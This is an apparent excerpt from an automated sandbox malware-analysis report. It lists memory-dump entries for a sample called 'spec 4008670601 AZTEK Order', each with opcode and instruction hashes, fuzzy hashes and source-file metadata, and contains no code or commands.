                                                      • Instruction Fuzzy Hash: B2218B71600655AFD716DB68C884F6AB7A8FF48740F14006AF944DB6A1D734EE80CB68
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                      • Instruction ID: f27bc3d32595e2d2a28f2afdfe7bd477ab87e2203f4179c5a27d0cc761d63a4c
                                                      • Opcode Fuzzy Hash: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                      • Instruction Fuzzy Hash: 1721C1725042569FD712DF59C888B9BFBECEF95740F08045AFD80C7251D730CA84C6A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                      • Instruction ID: 6abd9ae981982575b3e2aa8edd59aa3f3dce5ea437b666cecfcc2bbf6956d152
                                                      • Opcode Fuzzy Hash: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                      • Instruction Fuzzy Hash: D12107316457859BF327672CCD48B25BBD4AF41F64F1803A8FA20DB6E2D768C9818210
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                      • Instruction ID: 552b5d4620c05023ef3f69004a553e63fb0f690bdb8ee32e6edc24b90431ce9a
                                                      • Opcode Fuzzy Hash: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                      • Instruction Fuzzy Hash: 9F21AC352007019FCB25DF29C940B46B7F6BF08704F248468A549CB765E771E942CB94
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                      • Instruction ID: 3f1e1a35733c18ab4b483043ec73ccc482a82168fb58c75609fadfe6d8a29c5f
                                                      • Opcode Fuzzy Hash: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                      • Instruction Fuzzy Hash: AA115C36380A11BFD36659989CC4F27BA99DBD4B74F504229BF08CB281DB70DD008796
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                      • Instruction ID: 0924343abb96f985c46ba5bf48877c3759afe74fc596101afc524fc73cfc05da
                                                      • Opcode Fuzzy Hash: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                      • Instruction Fuzzy Hash: 3021F8B1E40219ABCB20DFAAD8849AEFBF8BF98700F10012EE405E7344D6709A45CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction ID: ff8d70cd646917cf6ee1185738f36bef9aa65b75f2d9fb5fa91b014927f00e1b
                                                      • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction Fuzzy Hash: 7F218C72A0020AEFDF129F98CC44BAEBBB9EF89310F244819F910E7251D774DA509B90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction ID: d992f811f32bb983c7f5ee8c6cb4a2d109a4167cb2e645ea79b87a998cabbf5b
                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction Fuzzy Hash: 6B11E273600609AFE7229F54CC45F9EFBB8EB84754F100029F6018B190D672ED44CB64
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58b770ea2dc71fbecaf7d26692060e699379a28c50fcc30b86cb58643650cc02
                                                      • Instruction ID: 5a1c265ffd25aa779b5c734ac5cdc5a53b01f6367edb5793570bfc85b81d5e71
                                                      • Opcode Fuzzy Hash: 58b770ea2dc71fbecaf7d26692060e699379a28c50fcc30b86cb58643650cc02
                                                      • Instruction Fuzzy Hash: 67119032701615DB9B11CF9DC4C0A16FFE9AFCA711B98416AEE089F204D6B2D9118791
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction ID: 0fb1524017bcf1c4bb1fecaee70bb5ef9db69bfa598361b54ad54413840bab91
                                                      • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction Fuzzy Hash: A9217972600649DFDB218F49C544A66FBF6FB94B10F14887DE58A8BA54C770ED02CB80
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                                      • Instruction ID: 4fb73aba76d46881805537ac3f25cf009ff28373f4eecc795164f883cc7f2bb5
                                                      • Opcode Fuzzy Hash: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                                      • Instruction Fuzzy Hash: F9214C75A00205DFCB15CF58C581AAAFBB6FB88315F6442ADD105AB311D771AD06CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25aa0951a4f9bd1ed696340aa30a2b16cdf011858b9cddfccf982191392153d4
                                                      • Instruction ID: 5696aa924f7416a3db8325fffd797b4804f32f4a34fcdb6d4f3c052845fe1f93
                                                      • Opcode Fuzzy Hash: 25aa0951a4f9bd1ed696340aa30a2b16cdf011858b9cddfccf982191392153d4
                                                      • Instruction Fuzzy Hash: D9216A71600A04EFD7218F68C881B66B7F8FF44360F04882DE5AAC7250EB30E940CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6118c4d9eeb15bf07532686454d328363cf8459e6d6758eaadf26db97d4dbd2f
                                                      • Instruction ID: aae7b4e27218d3abae8fb88d651a116adfc8469dad634b6cdee04aaf1deeccd6
                                                      • Opcode Fuzzy Hash: 6118c4d9eeb15bf07532686454d328363cf8459e6d6758eaadf26db97d4dbd2f
                                                      • Instruction Fuzzy Hash: 2D114C333001146FCF1ACB28CC85A6FB656EBD5770B38852CDA22CB280ED309902C291
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7aedb95b008ea8853bda72227499be9dc2c784074289fd22726699717438cf45
                                                      • Instruction ID: 6f4ca2958abb3706040e120445e54450ee9641580887091e798d352a8e1751fb
                                                      • Opcode Fuzzy Hash: 7aedb95b008ea8853bda72227499be9dc2c784074289fd22726699717438cf45
                                                      • Instruction Fuzzy Hash: F3119172240518FFD722DB5DC940F9AB7A8EF99B54F254029F605DB251EA70EB01C7E0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1efefef3b3fc72acc0d7a189b618e9b36a4095e88b30bbc022b16be4f2257d6
                                                      • Instruction ID: 409dd1cc7159b2c15427f9f127fe6a33f465f6cc5990f0baf712a3ac10790cff
                                                      • Opcode Fuzzy Hash: c1efefef3b3fc72acc0d7a189b618e9b36a4095e88b30bbc022b16be4f2257d6
                                                      • Instruction Fuzzy Hash: CF11EF72A0120DABCB25CF59D480E4AFBF4EF84260B168079E9059B315F734DD00CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction ID: f225f10c1fc7f5f584635039b8f238937ecb2e4c06cec27f1c4c44c84564a435
                                                      • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction Fuzzy Hash: 9711B236A00919AFDB19CB58C805B9DFBB9EF84310F158269EC55E7344E671AE51CB80
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                      • Instruction ID: 46f822328066f7db77f847d91c50ef2cf84011ce4c7689e058745a808a8ea766
                                                      • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                      • Instruction Fuzzy Hash: 8A2106B5A00B059FD3A0CF29C580B52BBF4FB48B10F50492EE98AC7B40E371E814CB90
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                      • Instruction ID: 75b0db9464aee5bbcb2bb341bf9762af9a4dda8751ede2e35daa7199bdd5d045
                                                      • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                      • Instruction Fuzzy Hash: FC110631600614EFE7229F48C844B56BBE5EF45754F068428EA88DB160D7B0DEC0D794
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction ID: 14d911da17c942933627f544b3e712701d0f0fad72acca80d0e3963ecad6b01d
                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction Fuzzy Hash: A0F0FC332046639BDF3316596844B6BE9958FD5A64F190035E30D9B244CA608D0956D2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction ID: a46c41a14af5b50bbe402efdf94818c698ff9c256db342a9256499ba7be68e51
                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction Fuzzy Hash: 5201F9326406899BD323971DCC49F59FBACEF82754F0944A9FA04DB691DB74CA40C211
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                      • Instruction ID: 2f79e4e4e7461e6e5d80897eed723f8d66b270eb29a83c1c0961e6103723f6ce
                                                      • Opcode Fuzzy Hash: d82e77ece2bd87824b66acb5ea1138b484c027a4d8dc46223f5fb09a69670d9d
                                                      • Instruction Fuzzy Hash: BC018F71A10249AFDB00DFA9D845AEEBBF8BF58314F14005AE505E7280E734EA01CB94
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                      • Instruction ID: 6afa0901f4cf4c36c1126d5d1e64ca5639833494c4d1788abb7e1bfdc6bfff82
                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                      • Instruction Fuzzy Hash: 5DF0127210001DBFEF029F94DD80DEF7B7DFB55798B104129FA1192160D635DE21A7A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                      • Instruction ID: 1cf266568112b5c696127f77aeb16c22e1879d5c51c459c2c7eda7468499cca5
                                                      • Opcode Fuzzy Hash: b0b4925a6fd01c6e59f6638ef765e177764688bf0921607c91d352159163cb0b
                                                      • Instruction Fuzzy Hash: 9C018936100119ABCF129E84D940EDA7F66FF4C754F058106FE18A6620C336DAB0EF81
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                      • Instruction ID: 6c43804fc8bf9bf494a4c08e88f308b692cadb5de56a1ed1831b0875df8ac413
                                                      • Opcode Fuzzy Hash: 51d30044f6dcb2a79ba72f4e7cca5e025010579d0d5243d1221ed57539a49b6c
                                                      • Instruction Fuzzy Hash: 07F024F22882415BFF169619AC05B32F69AE7C0650F65807AEB058B2D1EA70DC0583A8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                      • Instruction ID: 4a2e2e4f72588d2f76a78f9c9320bf034a240cd84f3bfe4d022c9ac607b15a83
                                                      • Opcode Fuzzy Hash: 5932f02e394e50f85535ed673162622bc8b8e023b4aa5b6aa53b4bc54b3170f1
                                                      • Instruction Fuzzy Hash: 2501A4712006859BE3239B6CCD48F65B7E8BB40B04F980594FA02CB6DAD768D6C18610
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction ID: 02ba3e093b89021263a7f2f5cfc39d1cbbb592f76194347b4136160494e29f6c
                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction Fuzzy Hash: 38F0AE37341E1747E776AA2D9414F2FE695AF90F51F05052CA556CB640DF60DD01C790
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                      • Instruction ID: 6bc764c4d7d44ffd304cfff4cb6852ca3ab287a8a6c9766d5646139e6e34d87b
                                                      • Opcode Fuzzy Hash: 8f9131eec53f2230f9a54d4f10b429ef831d3b6fa8ab960720cdb032f4f556dd
                                                      • Instruction Fuzzy Hash: 06F0A4706053049FC310EF28C445E2EB7E4FF58714F40465AB894DB394E634EA00C756
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                      • Instruction ID: bcba071f42b0064f1205c7a29a63c533f9fc3e14841c31f1a46402d8c438929d
                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                      • Instruction Fuzzy Hash: EAF054337115219BD3329A4ECCC0F16B768AFD5B60F190465EA54DB264C7A0ED8187D4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                      • Instruction ID: 99dd0bb410a2787ffd581fb0ebf0e87224e8061264122b0ff0a249861019dd9e
                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                      • Instruction Fuzzy Hash: 0AF02472600204AFE714DB21CD06F86F7F9EF98300F148078A545C7164FAB0ED10C654
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                      • Instruction ID: 94e3ede71048611eb505aa6b0d60509d85833652ac7dd53dc13b29f197d9c6e2
                                                      • Opcode Fuzzy Hash: 55bb3332b16af8a17ab549837521ceb2dd6461cbad0ae1d996c6c1d19c7130ca
                                                      • Instruction Fuzzy Hash: 28F04F70A01249AFCB04EF69D559EAEB7F4EF18344F008055A955EB395DA34EB01CB50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                      • Instruction ID: 09648bd036a9eb067ef1f1ee50114b07f31a8f397193437fba34f2ee9f41869e
                                                      • Opcode Fuzzy Hash: f3f07e41acbfef629007afa29aaf7bc89be78eca8a244525150de55fe82d302d
                                                      • Instruction Fuzzy Hash: 16F024319962E08FE736CB1CE044B21FBC49B80630F8C4B6AC54B83102C3A1E880C611
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                      • Instruction ID: 97f346df34b90fcdcf59a4d8a1d9842a333d72946d1f7e4c8b9849ddc4a1cf34
                                                      • Opcode Fuzzy Hash: 427688d106113d68e9b645f31779d5c88fd102ddab531ee5ddeb1ebf4e3a24a4
                                                      • Instruction Fuzzy Hash: 32F02726415A8086CF335B3C64503D16B58E741314F2D1045EDA0D7206D5748B83C729
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                      • Instruction ID: eea122ec1d062aef45c7e61260f658f3659cc8eb95c2e650e1184a3740e4ce42
                                                      • Opcode Fuzzy Hash: 2e5fb5a055da00ca564a95b49088fbe72424fc0daa28ae8d43b86d895614c618
                                                      • Instruction Fuzzy Hash: 0EF0EC725256999FE7239B2CC148B61FBF8AB017B0F1C986EE506C7512C360E880CA61
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction ID: a3f8b1357714e489ed819792044ec0cfde2be78becaa54882413dc40ba870679
                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction Fuzzy Hash: F2E0D8723406012BE7129F598CC8F47BBEEDFDAB10F040479B6045F256CAE2DD0986A4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                      • Instruction ID: cb7ffc22c819291c1065909938b6ca0f5276911b2babccc8146a092e322a93d6
                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                      • Instruction Fuzzy Hash: B5F08C72100204AFE3219F09D885B52F7B8EB55368F19C025E608EB160E37AEE40CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: 4e2ade01b4be75fdd48585a218aaae22a636bf4b46ed9bcc435e7978fcbc03d7
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
